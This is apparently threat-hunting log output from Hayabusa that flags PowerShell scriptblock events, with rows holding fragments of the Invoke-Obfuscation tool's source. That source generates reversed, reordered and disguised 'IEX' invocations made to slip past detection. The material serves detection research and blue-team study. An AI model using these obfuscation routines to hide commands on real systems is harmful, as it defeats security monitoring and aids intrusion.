Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. # This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. $RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. $RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. # If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. $SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.250 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 3 { # 3) -Join[Regex]::Matches($String,'.','RightToLeft') # Randomly choose to use 'RightToLeft' or concatenated version of this string in $JoinOptions below. If(Get-Random -Input (0..1)) { $RightToLeft = Out-ConcatenatedString $RightToLeftStr ""'"" } Else { $RightToLeft = ""'$RightToLeftStr'"" } # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]::$JoinStr("" + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + "".$ValueStr"" + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$RegexStr]::$MatchesStr("" + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + ""'.'"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RightToLeft + ' '*(Get-Random -Input @(0,1)) + "")"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '$_' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $ScriptString = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } default {Write-Error ""An invalid value was passed to switch block.""; Exit;} } # Perform final check to remove ticks if they now precede lowercase special characters after the string is reversed. # E.g. ""testin`G"" in reverse would be ""G`nitset"" where `n would be interpreted as a newline character. $SpecialCharacters = @('a','b','f','n','r','t','v','0') ForEach($SpecialChar in $SpecialCharacters) { If($ScriptString.Contains(""``""+$SpecialChar)) { $ScriptString = $ScriptString.Replace(""``""+$SpecialChar,$SpecialChar) } } Return $ScriptString } Function Out-EncapsulatedInvokeExpression { <# .SYNOPSIS HELPER FUNCTION :: Generates random syntax for invoking input PowerShell command. Invoke-Obfuscation Function: Out-EncapsulatedInvokeExpression Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncapsulatedInvokeExpression generates random syntax for invoking input PowerShell command. It uses a combination of IEX and Invoke-Expression as well as ordering (IEX $Command , $Command | IEX). .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-EncapsulatedInvokeExpression {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green|Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # The below code block is copy/pasted into almost every encoding function so they can maintain zero dependencies and work on their own (I admit using this bad coding practice). # Changes to below InvokeExpressionSyntax block should also be copied to those functions. # Generate random invoke operation syntax. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = Out-RandomCase $InvokeExpression # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $ScriptString + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $ScriptString = (Get-Random -Input $InvokeOptions) Return $ScriptString }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.250 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"omCase (Get-Random -Input @('ForEach-Object','ForEach','%')) # Select random method for building command to reverse the now-reversed $ScriptString to execute the original command. Switch(Get-Random -Input (1..3)) { 1 { # 1) $StringVar = $String; $StringVar[-1..-($StringVar.Length)] -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,('""' + ' '*(Get-Random -Input @(0,1)) + $ScriptStringReversed + ' '*(Get-Random -Input @(0,1)) + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $RandomVarGet = $RandomVarGet + '[' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '..' + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + "".$LengthStr"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ']' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $RandomVarGet) + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + ""[$StringStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' $JoinOption = (Get-Random -Input $JoinOptions) # Encapsulate in necessary IEX/Invoke-Expression(s). $JoinOption = Out-EncapsulatedInvokeExpression $JoinOption $ScriptString = $ScriptString + $JoinOption } 2 { # 2) $StringVar = [Char[]]$String; [Array]::Reverse($StringVar); $StringVar -Join '' # Replace placeholder with appropriate value for this Switch statement. $RandomVarSet = $RandomVarSet.Replace($RandomVarValPlaceholder,(""[$CharStr["" + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + ']' + ' '*(Get-Random -Input @(0,1)) + '""' + $ScriptStringReversed + '""')) # Set $ScriptStringReversed as environment variable $Random. $ScriptString = $RandomVarSet + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) $ScriptString = $ScriptString + ' '*(Get-Random -Input @(0,1)) + ""[$ArrayStr]::$ReverseStr("" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ';' # Build out random syntax depending on whether -Join is prepended or -Join '' is appended. # Now also includes [String]::Join .Net syntax and [String] syntax after modifying $OFS variable to ''. $JoinOptions = @() $JoinOptions += ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet $JoinOptions += $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ""-$JoinStr"" + ' '*(Get-Random -Input @(0,1)) + ""''"" $JoinOptions += ""[$StringStr]::$JoinStr"" + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $RandomVarGet + ' '*(Get-Random -Input @(0,1)) + ')' $JoinOptions += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + 